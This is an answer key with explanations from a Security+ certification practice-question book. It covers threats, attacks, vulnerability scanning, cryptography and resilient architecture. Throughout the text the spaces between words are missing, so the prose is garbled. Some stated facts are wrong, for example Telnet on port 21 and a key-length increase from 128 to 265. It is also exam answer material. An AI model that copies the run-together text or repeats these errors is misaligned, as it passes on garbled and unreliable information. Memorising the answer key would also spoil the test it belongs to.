177. A. Linuxprivilegescanbesetnumerically,and777setsuser,group,andworldtoallhaveread,write,andexecuteaccesstotheentire/etcdirectory.Settingpermissionslikethisisacommonworkaroundwhenpermissionsaren’tworkingbutcanexposedataormakebinariesexecutablebyuserswhoshouldnothaveaccesstothem.Whenyousetpermissionsforasystem,remembertosetthemaccordingtotheruleofleastprivilege:onlythepermissionsthatarerequiredfortheroleortaskshouldbeconfigured.

178. B. Footprintingistheprocessofgatheringinformationaboutacomputersystemornetwork,anditcaninvolvebothactiveandpassivetechniques.Mapping,fingerprinting,andaggregationarenotthecorrectorcommontermsforthispractice.

179. C. Whendial-upmodemswereinheavyuse,hackerswouldconductwardialingexercisestocallmanyphonenumberstofindmodemsthatwouldanswer.Whenwirelessnetworksbecamethenorm,thesametypeoflanguagewasused,leadingtotermslikewarwalking,wardriving,andevenwarflying.Therestoftheoptionsweremadeup,butyoushouldrememberthattheSecurity+examexpectsyoutoknowaboutwardrivingandwarflying.

180. B. Lightingandutilitysystems,aswellasSCADA,PLCs,CNC,scientificequipmentandsimilardevicesaretypesofoperationaltechnology.Since


thisisadistributedattackthatresultsinadenialofservice,itisadistributeddenial-of-service(DDoS)attack.OTsystemsareoftenisolatedorotherwiseprotectedfromremotenetworkconnectionstopreventthistypeofattacksincemanyOTdevicesdonothavestrongsecuritycontrolsorfrequentupdates.ASCADAoverflowisnotatermusedintheindustry,butnetworkandapplicationDDoSattacksdoappearontheSecurity+examoutline,andyouwillneedtobeabletodifferentiatethemfromthistypeofOTDDoS.

181. C. Afalsenegativeoccurswithavulnerabilityscanningsystemwhenascanisrunandanissuethatexistsisnotidentified.Thiscanbebecauseofaconfigurationoption,afirewall,orothersecuritysettingorbecausethevulnerabilityscannerisotherwiseunabletodetecttheissue.Amissingvulnerabilityupdatemightbeaconcerniftheproblemdidnotspecificallystatethatthedefinitionsarefullyup-to-date.Unlessthevulnerabilityissonewthatthereisnodefinition,amissingupdateshouldn’tbetheissue.Silentpatchingreferstoapatchingtechniquethatdoesnotshowmessagestousersthatapatchisoccurring.Afalsepositivewouldhavecausedavulnerabilitytoshowthatwasnotactuallythere.Thissometimeshappenswhenapatchorfixisinstalledbuttheapplicationdoesnotchangeinawaythatshowsthechange.

182. A. Refactoringaprogrambyautomatedmeanscanincludeaddingadditionaltext,comments,ornonfunctionaloperationstomaketheprogramhaveadifferentsignaturewithoutchangingsitsoperations.Thisistypicallynotamanualoperationduetothefactthatantimalwaretoolscanquicklyfindnewversions.Instead,refactoringisdoneviaapolymorphicorcodemutationtechniquethatchangesthemalwareeverytimeitisinstalledtohelpavoidsignature-basedsystems.

183. B. Hybridwarfareisarelativelynewtermthatdescribesthemultiprongedattacksconductedaspartofamilitaryornationalstrategyofpoliticalwarfarethatusestraditional,asymmetric,andcyberwarfaretechniquesalongwithinfluencemethodstoachievegoals.

184. C. Thisisanexampleofahoax.Hoaxesarefakesecuritythreatsandcanconsumebothtimeandresourcestocombat.Userawarenessandgoodhabitsforvalidatingpotentialhoaxesarebothusefulwaystopreventthemfromconsumingmoretimeandenergythantheyshould.Aphishingattemptwouldtargetcredentialsorotherinformation,noidentityinformationismentionedforidentityfraudhere,andaninvoicescam


involvesafakeormodifiedinvoice.

185. B. ThisisanattempttogettheservertosendarequesttoitselfaspartofanAPIcall,anditisanexampleofserver-siderequestforgery.Across-sitescriptingattackwouldusethevictim’sbrowserratherthanaserver-siderequest,aswouldaCSRFattack.

186. B. Threathuntingcaninvolveavarietyofactivitiessuchasintelligencefusion,combiningmultipledatasourcesandthreatfeeds,andreviewingadvisoriesandbulletinstoremainawareofthethreatenvironmentforyourorganizationorindustry.

187. C. Passwordsinmemoryareoftenstoredinplaintextforuse.Thismeansthatattackerscanrecoverthemiftheycanaccessthememorywherethepasswordisstored,evenifthestorageisephemeral.

188. D. TheAISserviceusesSTIXandTAXII.STIXandTAXIIareopenstandardsthattheDepartmentofHomelandSecuritystartedthedevelopmentofandusesforthistypeofeffort.YoucanreadmoreaboutAIShere:www.us-cert.gov/ais.

189. C. Thereconnaissancephaseofapenetrationtestinvolvesgatheringinformationaboutthetarget,includingdomaininformation,systeminformation,anddetailsaboutemployeeslikephonenumbers,names,andemailaddresses.

190. A. Angelahasimpersonatedanactualemployeeofthedeliveryservicetogainaccesstothecompany.Companyuniformsareaveryusefulelementforin-personsocialengineering.Whalingisatypeofphishingattackaimedatleadersinanorganization.Awateringholeattackdeploysmalwareorotherattacktoolsatasiteorsitesthatatargetgroupfrequentlyuses.PrependingisvaguelydefinedbytheSecurity+exambutcanmeananumberofthings.Whenyouseeprependingontheexam,itshouldnormallymean“addingsomethingtothefrontoftext.”

191. D. Acquisitionviathegraymarketcanleadtolackofvendorsupport,lackofwarrantycoverage,andtheinabilitytovalidatewherethedevicescamefrom.Nickshouldexpressconcernsaboutthesupplychain,andifhisdevicesneedtobefromatrustedsourceorsupplierwithrealsupporthemayneedtochangehisorganization’sacquisitionpractices.

192. B. XMLinjectionisoftendonebymodifyingHTTPqueriessenttoanXML-basedwebservice.Reviewingwebserverlogstoseewhatwassent


https://www.us-cert.gov/ais

andanalyzingthemforpotentialattackswillhelpChristinaseeifunexpecteduserinputisvisibleinthelogs.Syslog,authenticationlogs,andeventlogsareunlikelytocontaininformationaboutwebapplicationsthatwouldshowevidenceofanXMLinjection–basedattack.

Usethefollowingscenarioforquestions193–195.

FrankistheprimaryITstaffmemberforasmallcompanyandhasmigratedhiscompany’sinfrastructurefromanon-sitedatacentertoacloud-basedinfrastructureasaservice(IaaS)provider.Recentlyhehasbeenreceivingreportsthathiswebsiteisslowtorespondandthatitisinaccessibleattimes.Frankbelievesthatattackersmaybeconductingadenial-of-serviceattackagainsthisorganization.

193. C. Frank’sbestoptionistoreviewtheanti-denial-of-serviceandothersecuritytoolsthathiscloudhostingproviderprovides,andtomakeappropriateuseofthem.Themajorinfrastructureasaservice(IaaS)providershaveavarietyofsecuritytoolsthatcanhelpbothdetectandpreventDoSattacksfromtakingdownsitesthatarehostedintheirinfrastructure.Callingthecloudserviceprovider’sISPwillnotworkbecausetheISPworkswiththecloudprovider,notwithFrank!ItispossiblethecloudserviceprovidermightbeabletoassistFrank,buttheyaremostlikelytoinstructhimtousetheexistingtoolsthattheyalreadyprovide.

194. C. SinceFrankisusingthecloudserviceprovider’swebservices,hewillneedtoreviewthelogsthattheycapture.Ifhehasnotconfiguredthem,hewillneedtodoso,andhewillthenneedaserviceorcapabilitytoanalyzethemforthetypesoftrafficheisconcernedabout.SyslogandApachelogsarebothfoundonatraditionalwebhost,andtheywouldbeappropriateifFrankwasrunninghisownwebserversintheinfrastructureasaservice(IaaS)environment.

195. B. ThemostusefuldataislikelytocomefromanIPS,orintrusionpreventionsystem.Hewillbeabletodetermineiftheattackisadenial-of-service(DoS)attack,andtheIPSmaybeabletohelphimdeterminethesourceofthedenial-of-serviceattack.Afirewallmightprovidesomeusefulinformationbutwouldonlyshowwhetherornottrafficwasallowedandwouldnotanalyzethetrafficforattackinformation.Avulnerabilityscannerwouldindicateiftherewasanissuewithhisapplicationortheserver,butitwouldnotidentifythistypeofattack.Antimalwaresoftwarecanhelpfind


malwareonthesystembutisn’teffectiveagainstaDoSattack.

196. D. Contractualterms,auditing,andsecurityreviewsareallcommonmeansofreducingthird-partyriskswhenworkingwithavendorthatisperformingsystemsintegrationwork.AnSOC(serviceorganizationcontrols)reportwouldtypicallyberequestedifyouweregoingtouseathird-partyvendor’sdatacenterorhostedservices.

197. B. Traininganartificialintelligence(AI)ormachinelearning(ML)systemwithtainteddataisasignificantconcern.EliasneedstoensurethatthetrafficonhisnetworkistypicalandnonmalicioustoensurethattheAIdoesnotpresumethatmalicioustrafficisnormalforhisnetwork.

198. C. Themostcommonmotivationforhacktivistsistomakeapoliticalstatement.Reputationalgainsareoftenassociatedwithscriptkiddies,whereasfinancialgainismostcommonlyagoaloforganizedcrimeorinsiderthreats.Gatheringhigh-valuedataistypicalofbothnation-stateactorsandorganizedcrime.

199. D. Predictiveanalysistoolsuselargevolumesofdata,includinginformationaboutsecuritytrendsandthreats,largesecuritydatasetsfromvarioussecuritytoolsandothersources,andbehaviorpatterns,topredictandidentifymaliciousandsuspiciousbehavior.

200. C. IdentityfraudandidentitytheftcommonlyuseSocialSecuritynumbersaspartofthetheftofidentity.Tailgatinginvolvesfollowingapersonthroughasecuritydoororgatesothatyoudonothavetopresentcredentialsoracode,whereasimpersonationisasocialengineeringtechniquewhereyouclaimtobesomeoneelse.Blackmailisapotentialanswer,butthemostcommonusageisforidentityfraud.

201. A. SOARtools,likesecurityinformationandeventmanagement(SIEM)tools,arehighlyfocusedonsecurityoperations.Theyincludethreatandvulnerabilitymanagement,securityincidentresponse,andsecurityoperationsandautomationtools,buttheydonotprovidesourcecodeanalysisandtestingtools.

202. B. TheSecurity+examoutlinespecificallyliststheseitemsasthreatvectors.Althoughtherearemanyothers,youshouldbefamiliarwithdirectaccess,wireless,email,supplychain,socialmedia,removablemedia,andcloudasvectorsfortheexam.

203. C. Althoughitmayseemstrangeatfirst,bothSourceForgeandGitHub


areusedtohousesampleexploitcodeaswellasotherinformationthatthreatintelligenceanalystsmayfinduseful.Theyarenotpartofthedarkweb,noraretheyanautomatedindicatorsharing(AIS)sourceorapublicinformationsharingcenter.

204. B. Trustingratherthanvalidatinguserinputistherootcauseofimproperinputhandling.Allinputshouldbeconsideredpotentiallymaliciousandthustreatedasuntrusted.Appropriatefiltering,validation,andtestingshouldbeperformedtoensurethatonlyvaliddatainputisacceptedandprocessed.

205. C. ThecodeisanexampleofaPowerShellscriptthatdownloadsafileintomemory.Youcanruleouttheuploadoptionsbyreadingthescriptsinceitmentionsadownloadinthescriptexample.Sinceweseeastringbeingdownloaded,ratherthanafileandlocation,youmaybeabletoguessthatthisisafilelessmalwareexample.

206. C. SessionIDsshouldbeuniquefordistinctusersandsystems.AverybasictypeofsessionreplayattackinvolvesprovidingavictimwithasessionIDandthenusingthatsessionIDoncetheyhaveusedthelinkandauthenticatedthemselves.Protectionssuchassessiontimeoutsandencryptingsessiondata,aswellasencodingthesourceIP,hostname,orotheridentifyinginformationinthesessionkey,canallhelppreventsessionreplayattacks.

207. B. TheSecurity+examoutlinelistssevenmajorimpactcategories,includingdataloss,databreaches,anddataexfiltration.Datamodificationisnotlisted,butitisaconcernaspartoftheintegritylegoftheCIAtriad.

208. C. Academicjournalsaretheslowestoftheitemslistedbecauseofthereviewprocessesinvolvedwithmostreputablejournals.Althoughacademicjournalscanbeusefulresources,theyaretypicallynotup-to-the-minutesources.Otherresourcesyoushouldbeawareofarevendorwebsites,conferences,socialmedia,andRFCs(requestsforcomments).

209. C. Vulnerabilityscansandportscanscanoftenbedetectedinlogsbylookingforaseriesofportsbeingconnectedto.Inthiscase,thelogwascreatedbyscanningasystemwithanOpenVASscanner.Thereisnoindicationofasuccessfulloginorotherhackingattempt,andaservicestartupwouldshowinthemessageslog,nottheauthlog.Arebootwouldalsoshowinthemessageslogratherthantheauthlog.

210. C. Althoughitmaybetemptingtoimmediatelyupgrade,readingand


understandingtheCVEsforavulnerabilityisagoodbestpractice.OnceCharlesunderstandstheissue,hecanthenremediateitbasedontherecommendationsforthatspecificproblem.DisablingPHPorthewebserverwouldbreaktheservice,andinthiscase,onlynewerversionsofPHPthan5.4havethepatchCharlesneeds.

211. D. Although80and443arethemostcommonHTTPports,itiscommonpracticetorunadditionalwebserversonport8080whenanonstandardportisneeded.SSHwouldbeexpectedtobeonport22,RDPon3389,andMySQLon3306.

212. B. Oncethisissueisremediated,Rickshouldinvestigatewhythesystemwasrunningaplug-infrom2007.Inmanycases,whenyoudiscoveravulnerablecomponentlikethisitindicatesadeeperissuethatexistsintheorganizationorprocessesforsystemandapplicationmaintenance.Installingawebapplicationfirewall(WAF)orreviewingintrusionpreventionsystem(IPS)logsmaybeusefulifRickthinksthereareongoingattacksorthatsuccessfulattackshaveoccurred,buttheproblemdoesnotstateanythingaboutthat.Thereisnoindicationofcompromise,merelyacompletelyoutdatedplug-inversionintheproblem.Ifyouwantasamplesystemwithvulnerableplug-inslikethistotest,youcandownloadthe2015releaseoftheOpenWebApplicationSecurityProject(OWASP)brokenwebapplicationsvirtualmachine.Ithasawiderangeofcompletelyout-of-dateapplicationsandservicestopracticeagainst.

213. C. AnetworkdevicerunningSSHandawebserveronTCPport443isaverytypicaldiscoverywhenrunningavulnerabilityscan.Withoutanydemonstratedissues,Carolynshouldsimplynotethatshesawthoseservices.Telnetrunsonport21,anunencryptedwebserverwillrunonTCP80inmostcases,andWindowsfilesharesuseavarietyofportsincludingTCPports135–139and445.

214. B. Configurationreviews,eitherusingautomatedtoolormanualvalidation,canbeausefulproactivewaytoensurethatunnecessaryportsandservicesarenotaccessible.Configurationmanagementtoolscanalsohelpensurethatexpectedconfigurationsareinplace.Neitherpassivenoractivenetworkpacketcapturewillshowservicesthatarenotaccessed,meaningthatopenportscouldbemissed,andlogreviewwon’tshowallopenportseither.

215. C. Errorsareconsideredavulnerabilitybecausetheyoftenprovide


additionaldetailsaboutthesystemoritsconfiguration.Theytypicallycannotbeusedtodirectlyexploitorcrashthesystem.

216. D. Thisappearstobeasituationwhereyournetwork’sDNSserveriscompromisedandsendingpeopletoafakesite.ATrojanhorseismalwaretiedtoalegitimateprogram.IPspoofingwouldbeusingafakeIPaddress,butthatisnotdescribedinthisscenario.Infact,theusersarenoteventypinginIPaddresses—theyaretypinginURLs.Clickjackinginvolvestrickingusersintoclickingsomethingotherthanwhattheyintended.

217. C. Thisisaclassicexampleoftyposquatting.Thewebsiteisoffbyonlyoneortwoletters;theattackerhopesthatusersoftherealwebsitemistypetheURLandaretakentotheirfakewebsite.Sessionhijackingistakingoveranauthenticatedsession.Cross-siterequestforgerysendsfakerequeststoawebsitethatpurporttobefromatrusted,authenticateduser.Clickjackingattemptstotrickusersintoclickingonsomethingotherthanwhattheyintended.


Chapter2:ArchitectureandDesign1. C. Thediagramshowsservicesandports,butitdoesnotlisttheprotocol.

BenshouldaskiftheseareTCP-orUDP-basedservices,sinceanincorrectguesswouldresultinanonfunctionalservice,andopeningupunnecessaryprotocolsmayinadvertentlycreateexposuresorrisks.Thesubnetmaskisshownwheremultiplesystemsinanetworkontheclientsiderequireit,theservicenameisn’tnecessaryforafirewallrule,andAPIkeysshouldnotbestoredindocumentslikethis.

2. A. ThecorrectansweristheOpenWebApplicationSecurityProject(OWASP).Itisthedefactostandardforwebapplicationsecurity.

TheNorthAmericanElectricReliabilityCorporation(NERC)isconcernedwithelectricalpowerplantsecurity,TrustedFoundryisatermusedtodescribeasecuresupplychainforcomputerICs,andISA/IECstandardsareforsecuringindustrialautomationandcontrolsystems(IACSs).

3. B. Vendordiversitygivestwosecuritybenefits.Thefirstisthatthereisnosinglepointoffailureshouldonevendorceaseoperations.Thesecondbenefitisthateachvendorhasaspecificmethodologyandalgorithmsusedfordetectingmalware.Ifyouusethesamevendoratallpointswhereyouneedmalwaredetection,anyflaworweaknessinthatvendor’smethodologywillpersistacrossthenetwork.Usingasinglevendormeansthatanyweaknessinthatvendor’smethodologyortechnologycouldimpacttheentiresystemornetwork.Vendorforkingisnotatermintheindustry,andthisisnotaneutralact;vendordiversityimprovessecurity.

4. B. Inthisscenario,thebestfittoScott’sneedsisasecondnetworkattachedstorage(NAS)devicewithafullcopyoftheprimaryNAS.Inafailurescenario,thesecondaryNAScansimplytaketheplaceoftheprimaryNASwhileindividualdisksoreventhewholeNASisreplaced.Tape-basedbackupstakelongertorestore,regardlessofwhethertheyarefullorincrementalbackups,althoughincrementalbackupscantakemoretimeinsomecasessinceswappingtapesinordercanaddtimetotherestorationprocess.Finally,acloud-basedbackupsystemwouldbeusefulifScottwasworriedaboutalocaldisasterbutwouldbeslowerthanalocalidenticalNAS,thusnotmeetingScott’sprimaryrequirement.

5. C. Restorationordercanbeveryimportantinacomplexenvironmentdue


tosystemdependencies.Restorationordercanalsoensurethatthepropersecuritycontrolsareinplacebeforesystemsareonline.Adatacentershouldbeabletohandlesystemscomingonlinewithoutfailingifitspowersystemsareproperlydesigned.AsecondoutageduetofailedsystemswouldmeanthatYasminehasnotdeterminedwhytheoutagehasoccurred,makingrestorationpotentiallydangerousorproblematic.Finally,firesuppressionsystemsshouldonlyactivateforanactualfireorwhenfireprecursorslikesmokearedetected,notforincreasedheatload.

6. B. Airgappingreferstotheservernotbeingonanetwork.Thismeansliterallythatthereis“air”betweentheserverandthenetwork.Thispreventsmalwarefrominfectingthebackupserver.AseparateVLANorphysicalnetworksegmentcanenhancesecuritybutisnotaseffectiveasairgapping.Ahoneynetisusedtodetectattacksagainstanetwork,butitdoesn’tprovideeffectivedefenseagainstmalwareinthisscenario.

7. C. Windowspicturepasswordsrequireyoutoclickonspecificlocationsonapicture.Thisisanexampleofasomething-you-can-dofactor.Geolocationoranetworklocationareexamplesofsomewhereyouare,whereassomethingyouexhibitisoftenapersonalitytrait,andsomeoneyouknowisexactlywhatitsoundslike:someonewhocanidentifyyouasanindividual.

8. C. Hashfunctionsconvertvariable-lengthinputsintofixed-lengthoutputswhileminimizingthechangesofmultipleinputs,resultinginthesameoutput(collisions).Theyalsoneedtobefasttocompute.Hashesshouldnotbereversible;theyareaone-wayfunction!

9. B. Themostcommonwaytoensurethatthird-partysecuredestructioncompaniesperformtheirtasksproperlyistosignacontractwithappropriatelanguageandmakesurethattheycertifythedestructionofthematerialstheyareaskedtodestroy.Manualon-siteinspectionbythirdpartiesissometimesdoneaspartofcertification,butfederalcertificationisnotacommonprocess.Requiringpicturesofeverydestroyeddocumentwouldcreateanewcopy,thusmakingitaflawedprocess.

10. A. Usingbothserver-sideexecutionandvalidationrequiresmoreresourcesbutpreventsclient-sidetamperingwiththeapplicationanddata.ForOlivia’sdescribedneeds,server-sideexecutionandvalidationisthebestoption.

11. D. AnArduinoisamicrocontrollerwellsuitedforcustomdevelopmentof


embeddedsystems.Theyaresmall,inexpensive,andcommonlyavailable.UnlikeaRaspberryPi,theyarenotasmallcomputer,reducingtheiroverallriskofcompromise.Acustomfield-programmablegatearray(FPGA)willtypicallybemorecomplexandexpensivethananArduino,whereasarepurposeddesktopPCintroducesallthepotentialissuesthataPCcanincludesuchasavulnerableoperatingsystemorsoftware.

12. D. Digitalsignaturesarecreatedusingthesigner’sprivatekey,allowingittobevalidatedusingtheirpublickey.

13. C. Addingonebittoakeydoublestheworkrequired.Theoriginaleffortwouldhave2128potentialsolutions,whereastheincreasedkeylengthwouldrequire2129.Inreallife,keylengthsaren’tincreasedby1;instead,theyaretypicallyincreasedbyfactorsof2,suchas128to265,or1024to2048.

14. C. Keystretchingisusedtoimproveweakkeys.Onewayofimplementingitisbyrepeatedlyusingahashfunctionorablockcipher,increasingtheeffortthatanattackerwouldneedtoexerttoattacktheresultinghashedorencrypteddata.Therestoftheoptionsweremadeup.

15. A. Asaltisavalueaddedtoastringbeforeitishashed.Thesaltisstoredsothatitcanbeaddedtopasswordswhentheyareusedinthefuturetocomparetothehash.Sinceeachsaltisunique,thismeansthatanattackerwouldneedtogenerateauniquerainbowtableforeverysalttobeabletoattackthestoredhasheseffectively.Forhigh-valuepasswords,thismaybeworthwhile,butforbulklistsofpasswords,itisnotareasonableattackmethod.

16. C. IanwilluseMichelle’spublickeytoencryptthemessagesothatonlyshecanreaditusingherprivatekey.Ifhewantedtosignthemessage,hecouldusehisprivatekey,andMichellecouldusehispublickeytovalidatehissignature.NeitherIannorMichelleshouldeverrevealtheirprivatekeys.

17. A. Ellipticalcurvecryptography(ECC)isfasterbecauseitcanuseasmallerkeylengthtoachievelevelsofsecuritysimilartoalongerRSAkey(a228-bitellipticalcurvekeyisroughlyequivalenttoa2,380-bitRSAkey).Usingthesamekeytoencryptanddecryptwouldbetrueforasymmetricencryptioncryptosystem;however,neitherofthesearesymmetric.Eitheralgorithmcanrunonolderprocessorsgiventherightcryptographiclibrariesorprogramming,althoughbothwillbeslower.Both


canbeusedfordigitalsignatures.

18. A. Perfectforwardsecrecy(PFS)isusedtochangekeysusedtoencryptanddecryptdata,ensuringthatevenifacompromiseoccurs,onlyaverysmallamountofdatawillbeexposed.Symmetricencryptionusesasinglekey.QuantumkeyrotationandDiffie-Hellmankeymodulationarebothtermsmadeupforthisquestion.

19. A. Checkingavisitor’sIDagainsttheirlogbookentrycanensurethattheinformationtheyhaverecordediscorrectandthattheperson’sIDmatcheswhotheyclaimtobe.Biometricscansonlyworkonenrolledindividuals,meaningthatmanyguestsmaynothavebiometricdataenrolled.Two-personintegritycontrolwouldonlybeusefuliftherewasaconcernthataguardwasallowingunauthorizedindividualsintothefacility.Asecurityrobottypicallycannotvalidateavisitor’sidentityfromanIDandlogentry.Thismaychangeastheybecomemoreadvanced!

20. D. Honeypotsaredesignedtoattractahackerbyappearingtobesecurityholesthatareripeandreadyforexploitation.Ahoneynetisanetworkhoneypot.Thissecuritytechniqueisusedtoobservehackersinactionwhilenotexposingvitalnetworkresources.Anintrusiondetectionsystem(IDS)isusedtodetectactivitythatcouldindicateanintrusionorattack.Neitheractivedetectionnorfalsesubnetisacommonindustryterm.

21. C. SCADA,orSupervisoryControlandDataAcquisitionsystems,arecommonlyusedtomanagefacilitieslikepowerplants.Therestoftheoptionsweremadeup.

22. D. Primefactorizationalgorithmsandellipticcurvecryptographyarebelievedtobevulnerabletofuturequantumcomputing–drivenattacksagainstcryptographicsystems.Althoughthisislargelytheoreticalatthemoment,quantumencryptionmaybetheonlyreasonableresponsetoquantumattacksagainstcurrentcryptographicalgorithmsandsystems.

23. C. Geoffislookingforawarmsite,whichhassomeoralloftheinfrastructureandsystemsheneedsbutdoesnothavedata.Ifadisasteroccurs,Geoffcanbringanyequipmentthatheneedsorwantstothesitealongwithhisorganization’sdatatoresumeoperations.Ahotsiteisafullyfunctionalenvironmentwithallthehardware,software,anddataneededtooperateanorganization.Theyareexpensivetomaintainandrunbutareusedbyorganizationsthatcannottaketheriskofdowntime.Acoldsiteisalocationthatcanbebroughtonlinebutdoesnothavesystems;coldsites


typicallyhaveaccesstopowerandbandwidthbutneedtobefullyequippedtooperateafteradisastersincetheyarejustrentedspace.AnRTOisarecoverytimeobjective,anditmeasureshowlongitshouldtaketoresumeoperations;itisnotatypeofdisasterrecoverysite.

24. B. IfOliviawantstoensurethatthirdpartieswillbeunabletomodifytheoperatingsystemforInternetofThings(IoT)devices,requiringsignedandencryptedfirmwareforoperatingsystemupdatesisaneffectivemeansofstoppingallbutthemostadvancedthreats.Settingadefaultpasswordmeansthatacommonpasswordwillbeknown.CheckingtheMD5sumfornewfirmwareversionswillhelpadministratorsvalidatethatthefirmwareislegitimate,butsignedandencryptedfirmwareisamuchstrongercontrol.Finally,regularpatchingmayhelpsecurethedevicesbutwon’tpreventOSmodifications.

25. B. Afterquantumencryptionanddecryptiontechnologiesbecomemainstream,itisgenerallybelievedthatnonquantumcryptosystemswillbedefeatedwithrelativeease,meaningthatquantumcryptographywillberequiredtobesecure.Qubitsarequantumbits,notameasureofspeed;quantumencryptionwillbetherelevantsolutioninapost-quantumencryptionworld;andevenverylongRSAkeysareexpectedtobevulnerable.

26. B. Countermode(CTR)makesablockcipherintoastreamcipherbygeneratingakeystreamblockusinganonrepeatingsequencetofillintheblocks.Thisallowsdatatobestreamedinsteadofwaitingforblockstobereadytosend.Itdoesnotperformthereverse,turningastreamcipherintoablockcipher,nordoesitreversetheencryptionprocess(decryption).Publickeyscannotunlockprivatekeys;theyarebothpartofanasymmetricencryptionprocess.

27. D. Blockchainpublicledgerscontainanidentityforparticipants(althoughtheidentitymaybesemi-anonymous),thetransactionrecord,andthebalanceorotherdatathattheblockchainisusedtostore.Sincethereisnocentralauthority,thereisnotokentoidentifyauthorities.

28. C. Atestservershouldbeidenticaltotheproductionserver.Thiscanbeusedforfunctionaltestingaswellassecuritytesting,beforedeployingtheapplication.Theproductionserveristheliveserver.Adevelopmentserverwouldbeonetheprogrammersuseduringdevelopmentofawebapplication,andpredeploymentserverisnotatermtypicallyusedinthe


industry.

29. C. Stagingenvironments,sometimescalledpreproductionenvironments,aretypicallyusedforfinalqualityassurance(QA)andvalidationbeforecodeenterstheproductionenvironmentaspartofadeploymentpipeline.Stagingenvironmentscloselymirrorproduction,allowingrealistictestingandvalidationtobedone.Developmentandtestenvironmentsareusedtocreatethecodeandfortestingwhileitisbeingdeveloped.

30. C. Applicationprogramminginterface(API)keysarefrequentlyusedtomeetthisneed.AnAPIkeycanbeissuedtoanindividualororganization,andthenuseoftheAPIcanbetrackedtoeachAPIkey.IftheAPIkeyiscompromisedorabused,itcanberevokedandanewAPIkeycanbeissued.FirewallruleswrittentousepublicIPaddressescanbefragile,sinceIPaddressesmaychangeororganizationsmayhaveabroadrangeofaddressesthatmaybeinuse,makingithardtovalidatewhichsystemsorusersareusingtheAPI.Credentials,includingpasswords,arenotasfrequentlyusedasAPIkeys.

31. D. EmbeddedsystemslikesmartmeterstypicallydonotincludeaSQLservertoattack,makingSQLinjectionanunlikelyissue.Derekshouldfocusonsecuringthetrafficfromhismeter,ensuringthatdenial-of-service(DoS)attacksaredifficulttoaccomplishandthatremotelydisconnectingthemeterusingexposedadministrativeinterfacesorothermethodsisprevented.

32. A. Honeypotsaresystemsconfiguredtoappeartobevulnerable.Onceanattackeraccessesthem,theycapturedataandtoolswhilecausingtheattackertothinkthattheyaresuccessfullygainingcontrolofthesystem.ThisallowsdefenderslikeSelahtostudyandanalyzetheirtechniquesandtoolswithoutendangeringtheirproductionsystems.Anintrusiondetectionsystem(IDS)orintrusionprotectionsystem(IPS)candetectandstopattacks,andmayevencapturesometools,buttheyarenotdesignedtocapturelocalcommandsanddownloadedtools.AWAFisawebapplicationfirewallandisintendedtostopattacksonwebapplications.

33. D. Honeynetsareintentionallyvulnerablenetworkssetuptoallowforcaptureandanalysisofattackertechniquesandtools.Ablackholeisatermcommonlyusedforasystemornetworkdevicewheretrafficisdiscarded,andblackholeroutinginvolvessendingtraffictoanullroutethatgoesnowhere.


34. B. MariashouldimplementongoingauditingoftheaccountusageontheSCADAsystem.Thiswillprovideawarningthatsomeone’saccountisbeingusedwhentheyarenotactuallyusingit.Host-basedantivirusisalmostneverabadidea,butthisscenariodidnotindicatethatthecompromisewasduetomalware,soantimalwaremaynotaddressthethreat.SincetheengineerhasaccesstotheSCADAsystem,anetworkintrusionpreventionsystem(NIPS)isunlikelytoblockthemfromaccessingthesystem,andfull-diskencryption(FDE)willnotmitigatethisthreatbecausethesystemisliveandrunning,meaningthatthediskwillbedecryptedinuse.

35. B. BothAdvancedEncryptionStandard(AES)andDataEncryptionStandard(DES)areblockciphers.Thatmeansthattheyencryptgroups(blocks)ofplain-textsymbolstogetherasasingleblock.IfyouknowthateitherAESorDESisablockcipher,youcaneliminatehalfoftheoptionshere.Ifyouknowthatablockcipherworksongroupsofsymbolsorblocksoftext,youcanalsoeliminatehalftheoptionsasincorrect.

36. A. Ahardwaresecuritymodule(HSM)isthemostsecurewaytostoreprivatekeysforthee-commerceserver.AnHSMisaphysicaldevicethatsafeguardsandmanagesdigitalkeys.Full-diskencryption(FDE)willprotectthedataonthee-commerceserver,butitwon’thelpstorethekey.Itisalsodifficulttofullyencryptthee-commerceserverdrive,sincethedrivewillneedtobeinuseforthee-commercetofunction.Aself-encryptingdrive(SED)ismerelyautomaticfull-diskencryption.Software-definednetworking(SDN)won’taddresstheissuesinthisscenario,sinceitconfiguresnetworksviasoftwareanddoesnotprovidesecurekeystorage.

37. B. TransitgatewaysareatransithubusedtoconnectVPCs(virtualprivateclouds)toon-premisesnetworks.Youcanreadmoreabouttransitgatewaysatdocs.aws.amazon.com/vpc/latest/tgw/what-is-transit-gateway.html.IBMusesthesameterm,butforaveryspecificinternalcloudconnection.

38. C. Youshouldimplementastagingserversothatcodecanbedeployedtoanintermediatestagingenvironment.Thiswillallowtestingofsecurityfeatures,aswellascheckingtoseethatthecodeintegrateswiththeentiresystem.Usingthird-partylibrariesandsoftwaredevelopmentkits(SDKs)canhelpreduceerrorsandvulnerabilitiesinthecode.Sandboxingisusedtoisolateaparticularenvironment,andvirtualizationwillnotmitigatethisrisk.Eveniftheproductionserverisvirtualized,therisksarethesame.


http://docs.aws.amazon.com/vpc/latest/tgw/what-is-transit-gateway.html

Finally,deploymentpoliciesareagoodidea,buttheyarenotthemosteffectivewaytomitigatethisparticularrisk.

39. C. Ianshouldbeconcernedthatattackersmightbeabletoredirectshortmessageservice(SMS)messagessenttoVoIPphones.ThispotentialissueisonereasonthatsomemultifactordeploymentsdonotallowSMSmessagestobesenttoVoIPphonesintheenvironment,andsomeorganizationsdonotallowSMSasanoption,insteadrequiringhardwaretokensorapplication-basedmultifactorauthentication.Vishingisatypeofphishingdoneviavoice,voicemailhijackingwouldredirectvoicemailtoanothermailboxbyforwardingcalls,andweakmultifactorcodeinjectionwasmadeupforthisquestion.

40. A. Baselineconfigurations,perNIST800-53:“Baselineconfigurationsserveasabasisforfuturebuilds,releases,and/orchangestoinformationsystems.Baselineconfigurationsincludeinformationaboutinformationsystemcomponents(e.g.,standardsoftwarepackagesinstalledonworkstations,notebookcomputers,servers,networkcomponents,ormobiledevices;currentversionnumbersandpatchinformationonoperatingsystemsandapplications;andconfigurationsettings/parameters),networktopology,andthelogicalplacementofthosecomponentswithinthesystemarchitecture.Maintainingbaselineconfigurationsrequirescreatingnewbaselinesasorganizationalinformationsystemschangeovertime.Baselineconfigurationsofinformationsystemsreflectthecurrententerprisearchitecture.”

